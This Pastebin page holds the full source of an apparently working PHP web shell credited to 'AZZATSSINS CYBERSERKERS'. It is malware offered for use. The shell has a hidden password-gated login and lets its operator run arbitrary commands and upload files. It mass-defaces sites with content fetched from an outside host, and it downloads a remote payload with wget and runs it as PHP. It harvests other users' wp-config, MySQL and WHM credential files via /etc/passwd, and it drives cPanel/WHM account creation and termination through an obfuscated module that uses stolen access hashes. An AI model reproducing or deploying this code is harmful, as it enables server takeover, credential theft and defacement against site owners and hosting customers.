Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- Simple Web5Hell Linux/Unix By © AZZATSSINS CYBERSERKERS
- Login Page: ?god=damn
- Default Password: A/Z
- */
- $auth_pass = "ed4544d345562697a49e5cfc6a8ab545";
- $color = "#00ff00";
- $default_action = 'FilesMan';
- @define('SELF_PATH', __FILE__);
- if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
- header('HTTP/1.0 AZZATSSINS');
- exit;
- }
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('display_errors', 0);
- @set_time_limit(0);
- @set_magic_quotes_runtime(0);
- @define('VERSION', '2.1');
- if( get_magic_quotes_gpc() ) {
- function stripslashes_array($array) {
- return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
- }
- $_POST = stripslashes_array($_POST);
- }
- function echoLogin() {
- header('HTTP/1.0 404 Not Found');
- if($_GET['god']=="damn"){
- echo'<style>
- input { margin:0;background-color:#fff;border:1px solid #fff; }
- </style>
- <center>
- <input type=password name=lol><br>
- <input type=password name=lol><br>
- <input type=password name=lol><br>
- <input type=password name=lol><br>
- <form method=post>
- <input type=password name=pass>
- </form><br>
- <input type=password name=lol><br>
- <input type=password name=lol><br>
- <input type=password name=lol><br>
- <input type=password name=lol><br>
- </center>';
- }
- exit;
- }
- if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
- if( empty( $auth_pass ) ||
- ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
- $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- else
- echoLogin();
- @error_reporting(0);
- @ini_set('output_buffering',0);
- @ini_set('display_errors', 0);
- @ini_set('log_errors',0);
- /*
- SIMPLE WEB5HELL V1
- Script Edited By AZZATSSINS CYBERSERKERS (Editor/Author)
- Email : Cyberserkers@gmail.com
- Twitter : @AZZATSSINS
- Facebook: /AZZATSSINS.CYBERSERKERS
- VK: /azzatssins
- Dont Change ©Author/Editor® ^_^
- */
- echo "<title>SIMPLE WEB5HELL</title><body bgcolor=silver><center><br><div style='background:#d400f4;margin:0px;padding:26px;text-align:center;color:#202020;'><b><i><div style='background:red;margin:0px;padding:8px;text-align:center;color:white;'>[<a href='?'>HOME</a>] [<a href='?whmcs=decode'>WHMCS DECODER</a>] [<a href='?WHMCS=REMOTE'>WHMCS REMOTE</a>] [<a href='?reseller=grabber'>RESELLER</a>] [<a href='?whmcs=scan'>WHMCS SCANNER</a>] [<a href='?whmcs=shell'>WHMCS INJECT</a>] [<a href='?whmcs=client'>WHMCS CLIENT</a>] [<a href='?ceck=whmcs'>WHMCS CECK</a>] [<a href='?whmcs=token'>BYPASS TOKEN</a>] [<a href='?AZZATSSINS=CONFIGRABBER'>CONFIG</a>]</div><br><div style='background:silver;margin:0px;padding:10px;text-align:center;color:red;'>[<a href='?AZZATSSINS=encrypt'>ENCRYPTIONS</a>] [<a href='?md5=decrypter'>DECRYPTIONS</a>] [<a href='?open=ports'>OPEN PORT</a>] [<a href='?jo=wp'>JOWP</a>] [<a href='?AZZATSSINS=JPASS'>JOOMLA LOGIN</a>] [<a href='?AZZATSSINS=WPASS'>WORDPRESS LOGIN</a>] [<a href='?traindt=login'>TRAINDT LOGIN</a>] [<a href='?nuke=login'>NUKE LOGIN</a>] [<a href='?AZZATSSINS=BOMAIL'>BOMAIL</a>] [<a href='?mas=mailer'>MAILER</a>]</div><br><div style='background:lime;margin:0px;padding:10px;text-align:center;color:#202020;'><form method='POST'><input type='submit' name='azzatssins1' value='CONFIG'> <input type='submit' name='azzatssins' value='WHMCS DECODE'> <input type='submit' name='azzatssins2' value='JUMPING'> <input type='submit' name='azzatssins3' value='SYMLINK 01'> <input type='submit' name='azzatssins4' value='SYMLINK 02'> <input type='submit' name='azzatssins5' value='BYPASS FUN'> <input type='submit' name='azzatssins6' value='MYSQL'> <input type='submit' name='azzatssins7' value='SERVER VULN'> <input type='submit' name='azzatssins9' value='MASSDEFACE'> <input type='submit' name='azzatssins8' value='HIDE UR ASS'></i></b><br></form></div>";
- $currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
- $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
- $UName = `uname -a`;
- $SCWD = `pwd`;
- $UserID = `id`;
- if( $currentWD == "" ) {
- $currentWD = $SCWD;
- }
- if( $_POST['_act'] == "List files!" ) {
- $currentCMD = "ls -la";
- }
- echo "<div style='background:orange;margin:0px;padding:26px;text-align:center;color:#202020;'><br><form method=post enctype=\"multipart/form-data\"><table>";
- echo "<tr><td><b>Execute command:</b></td><td><input size=30 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
- echo "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
- echo "<tr><td><b>Change directory:</b></td><td><input size=30 name=\"_cwd\" value=\"".$currentWD."\"></td>";
- echo "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
- echo "<tr><td><b>Upload file:</b></td><td><input size=15 type=file name=_upl></td>";
- echo "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
- echo "</table></form>";
- echo"</div><br><br></div></center>";
- if($_POST['azzatssins9']){
- ?>
- <br><center><b><i><form ENCTYPE="multipart/form-data" method=post>
- Folder : <input typ=text name=path size=20 value="<?=getcwd();?>">
- <br>
- Nama File : <input typ=text name=file size=20 value="index.htm">
- <br>URL Script :
- <input typ=text name=url size=30 value="http://wget.yu.tl/files/lol.css">
- <br>
- <input type=submit value=Deface>
- </form></i></b></center>
- <?php
- $path=$_POST[path];
- $file=$_POST[file];
- $script=$_POST[url];
- $dir=opendir("$path");
- while($row=readdir($dir))
- {
- $start=@fopen("$row/$file","w+");
- $code=@file_get_contents($script);
- $finish=@fwrite($start,$code);
- if ($finish)
- {
- echo "$row/$file > Done<br><br>";
- }
- } /*MassDeface by AZZATSSINS*/
- }
- if($_POST['azzatssins']){
- system('wget www.wget.yu.tl/files/wd.css');system('mv wd.css wd.php'); echo'<meta http-equiv="Refresh" content= "0; url=wd.php">';
- }
- if($_POST['azzatssins1']){
- /*Config Grabber By AZZATSSINS CYBERSERKERS*/
- //$us = file_get_contents("/etc/passwd");
- $usa = fopen('/etc/passwd','r');
- $dir = mkdir('AZZATSSINS', 0777);
- $rrrr = "Options all \n DirectoryIndex AZZATSSINS \n Require None \n Satisfy Any";
- $frr = fopen('AZZATSSINS/.htaccess', 'w');
- fwrite($frr, $rrrr);
- while($us = fgets($usa)){
- if($us==""){
- echo "<font color=red>can't read /etc/passwd</font>";
- }
- else{
- preg_match_all('/(.*?):x:/', $us, $user_byk);
- foreach($user_byk[1] as $user){
- $dir1 = "/home/$user/public_html/";
- if(is_readable($dir1)){
- system('cp '.$dir1.'wp-config.php AZZATSSINS/'.$user.'-WPS-azzatssins.txt');
- system('cp '.$dir1.'configuration.php AZZATSSINS/'.$user.'-CMS-azzatssins.txt');
- system('cp '.$dir1.'config.php AZZATSSINS/'.$user.'-ETC-azzatssins.txt');
- system('cp /home/'.$user.'/.my.cnf AZZATSSINS/'.$user.'-CP-azzatssins.txt');
- system('cp /home/'.$user.'/.accesshash AZZATSSINS/'.$user.'-WHM-azzatssins.txt');
- }
- else{
- }
- }
- }
- } system('rm AZZATSSINS/.htaccess');
- echo'<meta http-equiv="Refresh" content= "0; url=AZZATSSINS">'; }
- if($_GET['WHMCS']=="REMOTE"){
- $emailente = 'cyberserkers@gmail.com';
- $nama = 'azzatssins';
- $ {
- "GLOBALS"
- }
- ["rshhhhzdjivn"] = "hostname";
- $ {
- "GLOBALS"
- }
- ["qybmmyvo"] = "dm5";
- $ {
- "GLOBALS"
- }
- ["cgdqizbjb"] = "infomail";
- $ {
- "GLOBALS"
- }
- ["ugwdatuetm"] = "httpheaders";
- $ {
- "GLOBALS"
- }
- ["jmossxbfynir"] = "frommail";
- $ {
- "GLOBALS"
- }
- ["buubgbf"] = "tomail";
- $ {
- "GLOBALS"
- }
- ["tfoqdtkoozl"] = "httpheader";
- $ {
- "GLOBALS"
- }
- ["gkfjmmp"] = "info";
- $ {
- "GLOBALS"
- }
- ["htlxwjkdfnbx"] = "subject";
- $ {
- "GLOBALS"
- }
- ["wyuvccqfyby"] = "emailente";
- $ {
- "GLOBALS"
- }
- ["yhcbrtqybhn"] = "tujuan";
- $ {
- "GLOBALS"
- }
- ["epyufhqui"] = "sep";
- $ {
- "GLOBALS"
- }
- ["klnlsxvu"] = "dm1";
- $ {
- "GLOBALS"
- }
- ["mgzcndyuozix"] = "dm4";
- $ {
- "GLOBALS"
- }
- ["bgyfsievqc"] = "dm3";
- $ {
- "GLOBALS"
- }
- ["cnpybqg"] = "dm2";
- $ {
- "GLOBALS"
- }
- ["cemjvape"] = "II11II11II11II11";
- $ {
- "GLOBALS"
- }
- ["tttkddsbp"] = "version";
- $ {
- "GLOBALS"
- }
- ["jqstuo"] = "bawah";
- $ {
- "GLOBALS"
- }
- ["rrbcihfi"] = "separator";
- $ {
- "GLOBALS"
- }
- ["lqfwxtwbjz"] = "hash";
- $ {
- "GLOBALS"
- }
- ["cntvmeburrl"] = "virgous";
- $ {
- "GLOBALS"
- }
- ["ejmlkkd"] = "i";
- $ {
- "GLOBALS"
- }
- ["rwocuxf"] = "result";
- $ {
- "GLOBALS"
- }
- ["sxeebm"] = "item";
- $ {
- "GLOBALS"
- }
- ["ppujmk"] = "element";
- $ {
- "GLOBALS"
- }
- ["kwsayld"] = "list";
- $ {
- "GLOBALS"
- }
- ["sqbtmnd"] = "xml";
- $ {
- "GLOBALS"
- }
- ["zmibinpgipr"] = "xmlstr";
- $ {
- "GLOBALS"
- }
- ["ltwtigrphxuo"] = "rawResult";
- $ {
- "GLOBALS"
- }
- ["nsqdbsct"] = "header";
- $ {
- "GLOBALS"
- }
- ["fughgfkrc"] = "api_path";
- $ {
- "GLOBALS"
- }
- ["xiykwn"] = "errstr";
- $ {
- "GLOBALS"
- }
- ["lvnrwks"] = "accessHash";
- $ {
- "GLOBALS"
- }
- ["gueuhqn"] = "user";
- ?>
- <html>
- <head>
- <title>WHM Remote Access</title>
- <meta name="description" content="remote access whm" />
- <meta name="description" content="accesswhmusingxmlapi" />
- <meta name="keywords" content="remoteaccesswhm"/>
- <meta name="keywords"content = "access whm using xml api"/>
- </head>
- <body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
- <STYLE>
- textarea{
- BORDER: dashed 1px blue;
- BORDER-COLOR: blue;
- background-image: url('http://i.imgur.com/zHNCk2e.gif');
- font: 5pt Verdana;
- color: lime;
- font-weight:bold;
- font-family: Tahoma;
- }
- body {
- font-family: Tahoma
- }
- tr {
- BORDER: dashed 1px #333;
- font: 5pt Verdana;
- color: #FFF;
- }
- td {
- BORDER: dashed 1px #333;
- font: 5pt Verdana;
- color: #FFF;
- }
- .tr2 {
- BORDER: dashed 1px blue;
- background-color: black;
- font: 5pt Verdana;
- color: #FFF;
- }
- .td2 {
- BORDER: dashed 1px blue;
- background-color: black;
- font: 5pt Verdana;
- color: #FFF;
- }
- hr {
- BORDER: dashed 1px blue;
- color: #FFF;
- }
- .table1 {
- BORDER: 0px Black;
- BACKGROUND-COLOR: Black;
- font: 5pt Verdana;
- color: #FFF;
- }
- .td1 {
- BORDER: 0px;
- BORDER-COLOR: #333333;
- font: 5pt Verdana;
- color: white;
- }
- .tr1 {
- BORDER: 0px;
- BORDER-COLOR: #333333;
- font: 5pt Verdana;
- color: #FFF;
- }
- table {
- BORDER: dashed 2px blue;
- BORDER-COLOR: blue;
- font: 5pt Verdana;
- color: #FFF;
- }
- input {
- border : dashed 1px;
- border-color : blue;
- BACKGROUND-COLOR: Black;
- font: 5pt Verdana;
- color: white;
- }
- select {
- BORDER-RIGHT: Black 1px solid;
- BORDER-TOP: #DF0000 1px solid;
- BORDER-LEFT: #DF0000 1px solid;
- BORDER-BOTTOM: Black 1px solid;
- BORDER-color: #FFF;
- BACKGROUND-COLOR: Black;
- font: 5pt Verdana;
- color: white;
- }
- submit {
- BORDER: buttonhighlight 2px outset;
- BACKGROUND-COLOR: Black;
- width: 30%;
- font: 5pt Verdana;
- color: #FFF;
- }
- BODY {
- SCROLLBAR-FACE-COLOR: Black;
- SCROLLBAR-HIGHLIGHT-color: #FFF;
- SCROLLBAR-SHADOW-color: #FFF;
- SCROLLBAR-3DLIGHT-color: #FFF;
- SCROLLBAR-ARROW-COLOR: Black;
- SCROLLBAR-TRACK-color: #FFF;
- SCROLLBAR-DARKSHADOW-color: #FFF
- margin: 1px;
- color: Red;
- background-color: Black;
- }
- .main {
- margin: -287px 0px 0px -490px;
- BORDER: dashed 1px #333;
- BORDER-COLOR: #333333;
- }
- .inputzbut{
- background-color:black;
- font: 5pt Verdana;
- color:white;
- margin:0px;
- colspan:0px;
- border:1px solid #444444;
- border-bottom:1px solid blue;
- border-top:1px solid blue;
- border-right:1px solid blue;
- border-left:1px solid blue;
- }
- .input2{
- background-color: black;
- color:white;
- font: 5pt Verdana;
- border:0px solid #444444;
- border-bottom:0px solid blue;
- border-top:0px solid blue;
- border-right:0px solid blue;
- border-left:0px solid blue;
- }
- .areazbut{
- background: black;
- font: 5pt Verdana;
- color:white;
- margin:0 4px;
- border:1px solid #444444;
- border-bottom:1px solid blue;
- border-top:1px solid blue;
- border-right:1px solid blue;
- border-left:1px solid blue;
- }
- .tt {
- background-color: Black;
- }
- .areaz {
- margin:auto;
- border:1px solid blue;
- width:80%;
- height:180px;
- background:#000000;
- padding:0 2px;
- }
- .areas {
- margin:auto;
- border:1px solid blue;
- width:100%;
- height:220px;
- background:#000000;
- padding:0 2px;
- }
- A.su {
- color: white;
- }
- A.su:link {
- text-decoration: none;
- color:red;
- }
- A.su:visited {
- text-decoration: none;
- color: red;
- }
- A.su:hover {
- text-decoration: underline;
- color: red;
- }
- A.su:active {
- text-decoration: none;
- color: red;
- }
- A.asu {
- color:yellow;
- }
- A.asu:link {
- text-decoration: none;
- color:yellow;
- }
- A.asu:visited {
- text-decoration: none;
- color:yellow;
- }
- A.asu:hover {
- text-decoration: underline;
- color:yellow;
- }
- A.asu:active {
- text-decoration: none;
- color: yellow;
- }
- A.asuu {
- color:lime;
- }
- A.asuu:link {
- text-decoration: none;
- color:lime;
- }
- A.asuu:visited {
- text-decoration: none;
- color:lime;
- }
- A.asuu:hover {
- text-decoration: underline;
- color:lime;
- }
- A.asuu:active {
- text-decoration: none;
- color:lime;
- }
- A:link {
- COLOR: White;
- TEXT-DECORATION: none
- }
- A:visited {
- COLOR: White;
- TEXT-DECORATION: none
- }
- A:hover {
- color: Red;
- TEXT-DECORATION: none
- }
- A:active {
- color: Red;
- TEXT-DECORATION: none
- }
- #result{margin:10px;}
- #result span{display:block;}
- #result .X{background-color:#101010;}
- #result .Y{background-color:green;}
- #result .Z{background-color:red;}
- a { text-decoration:none; }
- a:hover{ border-bottom:2px solid red; }
- *{ color:white; }
- #menu{ background:#111111;margin:8px 2px 4px 2px; }
- #menu a{ padding:4px 18px;
- margin:0;
- background:#black;
- text-decoration:none;
- letter-spacing:2px;
- border-radius: 4px;
- border-bottom:2px solid #444444;
- border-top:2px solid #444444;
- border-right:2px solid lime;
- border-left:2px solid lime;
- }
- #menu a:hover{
- background:#191919;
- border-radius: 7px;
- border-bottom:2px solid #white;
- border-top:2px solid #white;
- border-right:2px solid #FF0000;
- border-left:2px solid #FF0000;
- }
- .main { width:90%;
- background:#000000;
- margin:30px auto 10px;
- padding:10px 10px 5px 10px;
- border-radius:5px;
- -moz-border-radius:5px;
- -moz-box-shadow:0px 0px 10px #FFFFFF;
- }
- .output { margin:auto;
- border:1px solid red;
- width:100%;
- height:400px;
- background:#000000;
- padding:0 2px; }
- .b1{
- font-size:30px;padding:0;color:white;
- }
- .b2{
- font-size:40px;padding:0;color:red;
- }
- .b3{
- font-size:20px;padding:0;color:#444444;
- }
- .info{ background:#111111;
- width:99%;
- padding:5px;
- margin:10px auto 5px;
- text-align:center;
- font-size:13px;}
- .info a{ font-size:14px;}
- .info span{ font-size:14px;}
- .jaya{ margin:5px; text-align:right; }
- </style>
- </td></table></tr>
- </head>
- <center>
- <table border="1" width="100%"><tbody>
- <td>
- <center><p>
- <form method="GET">
- <input style="border : dashed 0px;"type="submit" name="azzatssins" value="WHM REMOTE ACCESS" id="button">
- </form>
- <form method="post" name="pageform" action="" onsubmit="return validate(this);">
- <p>
- <textarea rows="15" cols="38" name="vhash"></textarea>
- <p>
- <table border="1">
- <tr>
- <td align="center">
- Host Name
- </td>
- <td align="center">
- WHM Owner
- </td></tr>
- <td align="center">
- <input name="vhost" type="text" size="25" value=""></td>
- <td align="center">
- <input name="vuser" type="text"size="25" value="">
- </td></tr>
- <td colspan="2" align="center">
- <input name="azzatssins1" type="submit" value=" Info Hostname - WHM Version - Account - Package"></td></tr></table>
- </center>
- <br />
- </td>
- <td align="center"><br />
- <input type="submit" name="v2" value="Create Account" id="button"><br /><br/>
- <input type="submit" name="v3" value="Account Sumarry" id="button"><br /><br />
- <input type="submit" name="v4" value="Change Password" id="button"><br /><br />
- <input type="submit" name="v5" value="Suspend Account" id="button"><br /><br />
- <input type="submit"name="v6" value="Unsuspend Account" id="button"><br /><br />
- <input type="submit" name="v7" value="Terminate Account" id="button"><br /><br />
- </td>
- </tr>
- </form></tbody></table>
- <table border="1" width="100%">
- <tr><td align="center">
- <!-- start xml api -->
- <?php
- set_time_limit(1);error_reporting(1);ini_set("memory_limit","64M");header("Content-Type: text/html; charset=UTF-8");class Whm{var$controller=true;var$host=null;var$user=null;var$accessHash=null;var$errors=array();var$fp=null;function startup(&$controller){${"GLOBALS"}["bjabneswp"]="controller";$this->controller=&${${"GLOBALS"}["bjabneswp"]};}function init($host,$user,$accessHash){$this->host=$host;$this->user=${${"GLOBALS"}["gueuhqn"]};${${"GLOBALS"}["lvnrwks"]}=str_replace(array("
- ","
- "),"",${${"GLOBALS"}["lvnrwks"]});$this->accessHash=${${"GLOBALS"}["lvnrwks"]};}function connect($api_path){$pwrwkxx="errstr";$jxjnjhhffhhg="errno";$mobgrxe="errno";$ocsywwsfh="header";${"GLOBALS"}["npulqtw"]="header";$this->fp=fsockopen("ssl://".$this->host,2087,${$jxjnjhhffhhg},${$pwrwkxx},30);if(${$mobgrxe}==0&&$this->fp==false){$this->errors[]="Socket Error: Could not initialize socket.";return false;}elseif($this->fp==false){${"GLOBALS"}["ydhija"]="errno";$this->errors[]="Socket Error #".${${"GLOBALS"}["ydhija"]}.": ".${${"GLOBALS"}["xiykwn"]};return false;}$lirchk="header";$ikxgyddec="header";${$ikxgyddec}="";${$ocsywwsfh}.="GET ".${${"GLOBALS"}["fughgfkrc"]}." HTTP/1.0
- ";${${"GLOBALS"}["nsqdbsct"]}.="Host: ".$this->host."
- ";${$lirchk}.="Connection: Close
- ";${${"GLOBALS"}["nsqdbsct"]}.="Authorization: WHM ".$this->user.":".$this->accessHash."
- ";${${"GLOBALS"}["npulqtw"]}.="
- ";if(!@fputs($this->fp,${${"GLOBALS"}["nsqdbsct"]})){$this->errors[]="Unable to send header.";return false;}}function disconnect(){fclose($this->fp);}function getOutput(){$bwnxdryfqk="result";${"GLOBALS"}["bcgmchpujiui"]="rawResult";${"GLOBALS"}["pbiqulfirt"]="rawResultParts";$lukxqqrie="result";$umsdbbq="rawResult";${${"GLOBALS"}["bcgmchpujiui"]}="";${"GLOBALS"}["xxtvnpe"]="rawResultParts";while(!feof($this->fp)){${${"GLOBALS"}["ltwtigrphxuo"]}.=@fgets($this->fp,128);}${${"GLOBALS"}["xxtvnpe"]}=explode("
- ",${$umsdbbq});${$lukxqqrie}=${${"GLOBALS"}["pbiqulfirt"]}[1];return${$bwnxdryfqk};}function version(){$this->connect("/xml-api/version");${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();if(${${"GLOBALS"}["zmibinpgipr"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${${"GLOBALS"}["sqbtmnd"]}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});return$xml->version;}function gethostname(){$frzbhexw="xmlstr";$this->connect("/xml-api/gethostname");$mttfht="xmlstr";${$mttfht}=$this->getOutput();$kbewsugpk="xml";$hdcaeudhj="xmlstr";if(${$hdcaeudhj}==""){$this->errors[]="No output.";return false;}$this->disconnect();${$kbewsugpk}=new SimpleXMLElement(${$frzbhexw});return$xml->hostname;}function listaccts(){${"GLOBALS"}["crvwckqlxh"]="xmlstr";$this->connect("/xml-api/listaccts");${"GLOBALS"}["wcrfjl"]="list";${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();$eqksyigyu="xmlstr";$gsrvsafam="i";if(${${"GLOBALS"}["crvwckqlxh"]}==""){$this->errors[]="No output.";return false;}$sjwtvwj="list";$this->disconnect();${${"GLOBALS"}["sqbtmnd"]}=new DOMDocument();$xml->loadXML(${$eqksyigyu});${${"GLOBALS"}["kwsayld"]}=$xml->getElementsByTagName("user");${$gsrvsafam}=0;foreach(${${"GLOBALS"}["kwsayld"]} AS${${"GLOBALS"}["ppujmk"]}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["user"]=$item->nodeValue;$xptvqyyhz="i";${$xptvqyyhz}++;}}$mhlrnwepg="element";${${"GLOBALS"}["kwsayld"]}=$xml->getElementsByTagName("domain");${"GLOBALS"}["dkbptovxc"]="i";${${"GLOBALS"}["dkbptovxc"]}=0;foreach(${${"GLOBALS"}["kwsayld"]} AS${${"GLOBALS"}["ppujmk"]}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${"GLOBALS"}["gnijdvt"]="i";$vnmpqxit="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["gnijdvt"]}]["domain"]=$item->nodeValue;${$vnmpqxit}++;}}${${"GLOBALS"}["kwsayld"]}=$xml->getElementsByTagName("plan");${${"GLOBALS"}["ejmlkkd"]}=0;foreach(${${"GLOBALS"}["kwsayld"]} AS${${"GLOBALS"}["ppujmk"]}){$kgpxaihbbt="item";foreach($element->childNodes AS${$kgpxaihbbt}){$gznkditpwjv="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["package"]=$item->nodeValue;${$gznkditpwjv}++;}}${$sjwtvwj}=$xml->getElementsByTagName("unix_startdate");${${"GLOBALS"}["ejmlkkd"]}=0;foreach(${${"GLOBALS"}["wcrfjl"]} AS${$mhlrnwepg}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${"GLOBALS"}["jnspmcrgop"]="i";$fdsrmhfo="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["jnspmcrgop"]}]["start_date"]=$item->nodeValue;${$fdsrmhfo}++;}}return${${"GLOBALS"}["rwocuxf"]};}function listPkgs(){$olbumfu="xml";${"GLOBALS"}["bhqjwy"]="xmlstr";$vkvqwmml="list";$this->connect("/xml-api/listpkgs");${"GLOBALS"}["pesngtvb"]="list";$oxhlzbad="element";${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();if(${${"GLOBALS"}["bhqjwy"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${$olbumfu}=new DOMDocument();$xml->loadXML(${${"GLOBALS"}["zmibinpgipr"]});${"GLOBALS"}["widejwlmsrbo"]="i";${${"GLOBALS"}["kwsayld"]}=$xml->getElementsByTagName("name");${${"GLOBALS"}["ejmlkkd"]}=0;foreach(${${"GLOBALS"}["kwsayld"]} AS${$oxhlzbad}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${"GLOBALS"}["gljaytjur"]="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["gljaytjur"]}]["package_name"]=$item->nodeValue;${${"GLOBALS"}["ejmlkkd"]}++;}}${${"GLOBALS"}["kwsayld"]}=$xml->getElementsByTagName("QUOTA");${"GLOBALS"}["oenwrsg"]="element";${${"GLOBALS"}["widejwlmsrbo"]}=0;foreach(${$vkvqwmml} AS${${"GLOBALS"}["oenwrsg"]}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${"GLOBALS"}["uusrhduy"]="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["package_quota"]=$item->nodeValue;${${"GLOBALS"}["uusrhduy"]}++;}}${"GLOBALS"}["vlgvletxhhl"]="list";${${"GLOBALS"}["vlgvletxhhl"]}=$xml->getElementsByTagName("BWLIMIT");${${"GLOBALS"}["ejmlkkd"]}=0;foreach(${${"GLOBALS"}["pesngtvb"]} AS${${"GLOBALS"}["ppujmk"]}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${"GLOBALS"}["pspifihvqw"]="result";$inxltlyc="i";${${"GLOBALS"}["pspifihvqw"]}[${$inxltlyc}]["package_bw_limit"]=$item->nodeValue;${${"GLOBALS"}["ejmlkkd"]}++;}}return${${"GLOBALS"}["rwocuxf"]};}function createAccount($acctDomain,$acctUser,$acctPass,$acctPackg){$vnxrfpopyezq="xml";$tybhaauxoko="xmlstr";${"GLOBALS"}["ohdlmvgirrg"]="xmlstr";$this->connect("/xml-api/createacct?username=$acctUser&password=$acctPass&plan=$acctPackg&domain=$acctDomain&ip=n&cgi=y&frontpage=y&cpmod=x3&useregns=1&reseller=1");${$tybhaauxoko}=$this->getOutput();if(${${"GLOBALS"}["ohdlmvgirrg"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${$vnxrfpopyezq}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});if($xml->result->status==1){$mhcvech="result";${"GLOBALS"}["bhvgxqme"]="result";${${"GLOBALS"}["rwocuxf"]}["status"]=$xml->result->status;${$mhcvech}["statusmsg"]=$xml->result->statusmsg;$snkwgpps="result";${${"GLOBALS"}["rwocuxf"]}["ip"]=$xml->result->options->ip;${"GLOBALS"}["ulbbaopz"]="result";${${"GLOBALS"}["rwocuxf"]}["nameserver"]=$xml->result->options->nameserver;${"GLOBALS"}["qtgspvp"]="result";${"GLOBALS"}["lehyuj"]="result";${${"GLOBALS"}["ulbbaopz"]}["nameserver2"]=$xml->result->options->nameserver2;${${"GLOBALS"}["rwocuxf"]}["nameserver3"]=$xml->result->options->nameserver3;${${"GLOBALS"}["lehyuj"]}["nameserver4"]=$xml->result->options->nameserver4;${$snkwgpps}["package"]=$xml->result->options->package;${${"GLOBALS"}["qtgspvp"]}["rawout"]=$xml->result->rawout;return${${"GLOBALS"}["bhvgxqme"]};}else{$this->errors[]=$xml->result->statusmsg;return false;}}function accountsummary($accUser){$this->connect("/xml-api/accountsummary?user=$accUser");$dxoluomgdiq="xmlstr";${$dxoluomgdiq}=$this->getOutput();if(${${"GLOBALS"}["zmibinpgipr"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${${"GLOBALS"}["sqbtmnd"]}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});if($xml->status==1){$wagnskiph="result";$flimtqwawp="result";$nbdwembyxqc="result";$wmetitlano="result";${"GLOBALS"}["xvfubsjlhi"]="result";$pjtlsoucqgw="result";$yofnfnzn="result";${"GLOBALS"}["ucuajwylna"]="result";${${"GLOBALS"}["rwocuxf"]}["disklimit"]=$xml->acct->disklimit;${$yofnfnzn}["diskused"]=$xml->acct->diskused;${${"GLOBALS"}["xvfubsjlhi"]}["diskused"]=$xml->acct->diskused;${${"GLOBALS"}["ucuajwylna"]}["domain"]=$xml->acct->domain;$kshdodvotj="result";$euppkrpbjh="result";${$wmetitlano}["email"]=$xml->acct->email;${${"GLOBALS"}["rwocuxf"]}["ip"]=$xml->acct->ip;${$nbdwembyxqc}["owner"]=$xml->acct->owner;${$kshdodvotj}["partition"]=$xml->acct->partition;${$pjtlsoucqgw}["plan"]=$xml->acct->plan;${$flimtqwawp}["startdate"]=$xml->acct->startdate;${${"GLOBALS"}["rwocuxf"]}["theme"]=$xml->acct->theme;${$wagnskiph}["unix_startdate"]=$xml->acct->unix_startdate;${${"GLOBALS"}["rwocuxf"]}["user"]=$xml->acct->user;return${$euppkrpbjh};}else{$this->errors[]=$xml->statusmsg;return false;}}function passwd($accUser,$pass){$this->connect("/xml-api/passwd?user=$accUser&pass=$pass");${"GLOBALS"}["wglvvmwpi"]="xmlstr";${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();if(${${"GLOBALS"}["wglvvmwpi"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${${"GLOBALS"}["sqbtmnd"]}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});if($xml->passwd->status==1){$nvlwga="result";${$nvlwga}["statusmsg"]=$xml->passwd->statusmsg;$pbaeyfpm="result";${${"GLOBALS"}["rwocuxf"]}["frontpage"]=$xml->passwd->frontpage;${${"GLOBALS"}["rwocuxf"]}["ftp"]=$xml->passwd->ftp;${${"GLOBALS"}["rwocuxf"]}["mail"]=$xml->passwd->mail;${$pbaeyfpm}["mysql"]=$xml->passwd->mysql;$jukasqwy="result";${$jukasqwy}["system"]=$xml->passwd->system;${${"GLOBALS"}["rwocuxf"]}["rawout"]=$xml->passwd->rawout;return${${"GLOBALS"}["rwocuxf"]};}else{$this->errors[]=$xml->passwd->statusmsg;return false;}}function suspend($acctUser,$reason){$this->connect("/xml-api/suspendacct?user=$acctUser&reason=$reason");${"GLOBALS"}["cbvdyhirx"]="xmlstr";${${"GLOBALS"}["cbvdyhirx"]}=$this->getOutput();${"GLOBALS"}["eefbbnasou"]="xmlstr";if(${${"GLOBALS"}["zmibinpgipr"]}==""){$this->errors[]="No output.";return 